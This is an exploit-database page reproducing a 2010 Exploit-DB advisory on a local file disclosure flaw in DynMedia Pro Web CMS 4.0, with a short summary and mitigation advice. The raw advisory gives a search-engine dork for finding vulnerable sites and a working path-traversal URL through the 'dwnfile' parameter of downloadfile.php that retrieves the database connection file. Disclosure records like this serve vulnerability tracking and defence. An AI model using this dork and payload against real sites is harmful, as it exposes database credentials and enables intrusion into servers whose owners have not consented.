header-logo
Suggest Exploit
vendor:
DynMedia Pro Web CMS
by:
Mbah_Semar
N/A
CVSS
HIGH
Local File Disclosure
CWE
Product Name: DynMedia Pro Web CMS
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

DynMedia Pro Web CMS 4.0 Local File Disclosure Exploit

This exploit allows an attacker to disclose local files by exploiting the DynMedia Pro Web CMS 4.0 software. By manipulating the 'dwnfile' parameter in the 'downloadfile.php' script, an attacker can retrieve sensitive information from the server.

Mitigation:

The vendor should release a patch to fix the vulnerability. In the meantime, users should restrict access to the 'downloadfile.php' script and sanitize user input.
Source

Exploit-DB raw data:

|||[!]===========================================================================[!]
 
[~] DynMedia Pro Web CMS 4.0 ||Local File Disclosure Exploit|
|[~] Author : Mbah_Semar (fuji@undiphacker.net)
[~] Homepage : http://www.indonesianhacker.or.id | http://suramcrew.org
| http://www.masfuji.us
[~] Date : 22 April, 2010
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://www.vinyadmedia.com
[+] License : Commercial
[+] Vulnerability : ||||Local File Disclosure|
|[+] Dork : "Powered by Vinyad dynMedia�Pro 4.0"
[+] Version : 4.0
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
    http://www.example.com/downloadfile.php?dwnfile=[LFD]
 
 
 
[ Example ]
 
    http://www.example.com/downloadfile.php?dwnfile=../library/dbconnect.php
 
 
[!]===========================================================================[!]
 
[ Thanks TO ]
 
[+] Indonesian Hacker Team
[+] Virgi aka Bl4ck_b0x, gisa maho, Lukas Ranger Zero-Line, Aanz, Angga,
riv182, sudden_death, alusius, and you.
[+] Semua kaum Suram dimanapun berada yang tidak bisa disebukan satu persatu
 
 
[ NOTE ]
 
[+] Tolong kasih saya sesaji berupa Kopi Item dan rokok Gudang Garam
International
|

Navigation

Suggest Exploit

Services By CQR